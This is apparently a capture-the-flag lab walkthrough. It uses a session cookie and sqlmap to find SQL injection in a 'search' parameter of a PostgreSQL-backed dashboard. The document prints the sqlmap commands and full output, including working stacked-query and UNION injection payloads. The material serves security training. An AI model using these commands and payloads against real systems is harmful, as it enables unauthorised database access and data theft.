CMD INJECTION
#Identify vulnerable SQLi entry points
root@htb:~$ which sqlmap
/usr/bin/sqlmap
root@htb:~$ sqlmap -hh
...
Usage: python3 sqlmap [options]
...
root@htb:~$ BROWSER > http://10.129.95.174/dashboard.php?search=null > F12 > Storage > Cookies >
PHPSESSID:rgqtj2q53rvk6mlva0plqu7tsu
* the cookie is required for authentication
- this implies that the logged in user has elevated privileges; admin
root@htb:~$ sqlmap -u 'http://10.129.95.174/dashboard.php?search=null' --cookie="PHPSESSID=rgqtj2q53rvk6mlva0plqu7tsu"
...
[13:50:27] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n]
[13:50:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:50:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[13:50:32] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[13:50:32] [WARNING] reflective value(s) found and filtering out
[13:50:32] [INFO] target URL appears to have 5 columns in query
[13:50:32] [INFO] GET parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: search (GET)
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: search=null';SELECT PG_SLEEP(5)--
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: search=null' UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113))||(CHR(87)||CHR(80)||CHR(104)||CHR(72)||CHR(107)||CHR(115)||CHR(73)||CHR(112)||CHR(109)||CHR(115)||CHR(111)||CHR(74)||CHR(108)||CHR(73)||CHR(100)||CHR(101)||CHR(74)||CHR(86)||CHR(119)||CHR(66)||CHR(82)||CHR(74)||CHR(77)||CHR(87)||CHR(113)||CHR(111)||CHR(110)||CHR(103)||CHR(66)||CHR(122)||CHR(78)||CHR(80)||CHR(102)||CHR(85)||CHR(75)||CHR(101)||CHR(85)||CHR(72)||CHR(77)||CHR(121))||(CHR(113)||CHR(113)||CHR(120)||CHR(113)||CHR(113)),NULL,NULL,NULL-- neMF
---
[13:50:34] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[13:50:34] [INFO] fetched data logged to text files under '/home/str1f3/.local/share/sqlmap/output/10.129.95.174'
[*] ending @ 13:50:34 /2025-04-17/Last updated